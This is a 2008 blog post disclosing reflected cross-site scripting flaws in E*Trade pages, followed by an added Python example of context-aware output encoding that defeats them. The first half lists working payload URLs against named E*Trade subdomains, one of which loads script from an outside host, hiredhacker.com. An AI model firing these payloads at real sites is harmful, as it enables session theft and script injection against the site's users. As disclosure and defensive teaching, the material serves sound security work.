Fun with E*Trade

November 4th, 2008

Most of these require the user to be logged in, and for those who don't know, the 'expression' technique only works in IE; you will need a different method to test it in other browsers. See RSnake's XSS cheat sheet for examples.


https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E


https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))


https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))


https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/))


https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl

(nav and subnav are also vulnerable parameters)
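All of the URLs above rely on the same defect: a request parameter is echoed into the page without encoding for the place it lands in. The first four land inside a double-quoted HTML attribute (so `"` closes the attribute and either opens a new tag or adds a `style` attribute), while the `global.etrade.com` one lands inside a single-quoted JavaScript string (so `'` closes the literal). The following is an added example, not code from the post or from E*Trade, showing the context-aware output encoding that neutralizes each of those contexts. The reflected values are the post's own payloads, URL-decoded; the element and variable names (`textIn` input, `screen` variable) are assumptions standing in for whatever the real pages rendered.

```python
import html
import json

# Reflected values taken from the post's PoC URLs (URL-decoded), used here as
# constructed sample input: each one breaks out of the context it is reflected
# into when the application echoes it without encoding.
REFLECTED_INTO_ATTRIBUTE = [
    '"><script src="http://www.hiredhacker.com/xss.js"></script>',
    'changemypasswords" style="width:expression(alert(/owned/))',
]
REFLECTED_INTO_JS_STRING = "1';alert(/owned/);//"


def encode_for_html_attribute(value: str) -> str:
    """Encode for a double-quoted HTML attribute: & < > " ' become entities,
    so the value can neither close the attribute nor start a new tag."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Encode for a JavaScript string literal: json.dumps yields a double-quoted
    literal with quotes and backslashes escaped; < and > are escaped as well so
    a literal </script> inside the value cannot end the enclosing script block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


ATTR_PREFIX = '<input type="text" name="textIn" value="'   # assumed markup
SCRIPT_PREFIX = "<script>var screen = "                     # assumed markup


def render_input(value: str) -> str:
    """The attribute-reflection pattern from the post, with encoding applied."""
    return f'{ATTR_PREFIX}{encode_for_html_attribute(value)}">'


def render_screen_script(value: str) -> str:
    """The JS-string-reflection pattern from the post, with encoding applied.
    The literal is emitted double-quoted, so the payload's ' is inert."""
    return f"{SCRIPT_PREFIX}{encode_for_js_string(value)};</script>"


def attribute_stays_closed(rendered: str) -> bool:
    """True when nothing inside the attribute value can close it or open a tag."""
    inner = rendered[len(ATTR_PREFIX):-len('">')]
    return '"' not in inner and "<" not in inner


def js_literal_stays_closed(rendered: str) -> bool:
    """True when the emitted literal has exactly its two delimiting quotes,
    round-trips to the original value, and cannot terminate the script."""
    inner = rendered[len(SCRIPT_PREFIX):-len(";</script>")]
    return (
        inner.startswith('"')
        and inner.endswith('"')
        and "<" not in inner
        and json.loads(inner) == REFLECTED_INTO_JS_STRING
    )


if __name__ == "__main__":
    for sample in REFLECTED_INTO_ATTRIBUTE:
        print(render_input(sample), attribute_stays_closed(render_input(sample)))
    rendered = render_screen_script(REFLECTED_INTO_JS_STRING)
    print(rendered, js_literal_stays_closed(rendered))
```

The point of keeping two encoders is that the rules differ by context: HTML entity encoding does nothing inside a `<script>` block, and JavaScript string escaping does nothing inside an attribute. The IE-only `expression()` trick in the post needs no special handling once the `"` that introduces the extra `style` attribute is turned into `&quot;`.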